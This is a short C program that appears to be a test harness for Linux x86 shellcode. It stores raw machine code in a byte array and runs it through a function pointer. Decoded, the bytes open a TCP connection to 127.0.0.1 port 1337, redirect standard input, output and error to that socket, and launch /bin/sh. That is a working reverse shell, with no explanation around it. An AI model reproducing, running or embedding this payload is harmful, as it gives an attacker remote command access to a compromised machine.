#include <stdio.h>

char sa[] =   "\x6A\x00\x6A\x01\x6A\x02\x89\xE1\x6A\x66\x58\xBB\x01\x00\x00\x00\xCD\x80\x50\x5A\xB8\x7F\x00\x00\x01\x50\xB8\x02\x00\x05\x39\x50\x89\xE3\x6A\x10\x53\x52\x89\xE1\xBB\x03\x00\x00\x00\xB8\x66\x00\x00\x00\xCD\x80\xB9\x03\x00\x00\x00\x49\xB8\x3F\x00\x00\x00\x51\x52\xCD\x80\x75\xF4\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x89\xC1\x89\xC2\xB0\x0B\xCD\x80";

int main( void )
{
    void( *shell)() = (void*)&sa;
    shell();
    return 0;
}

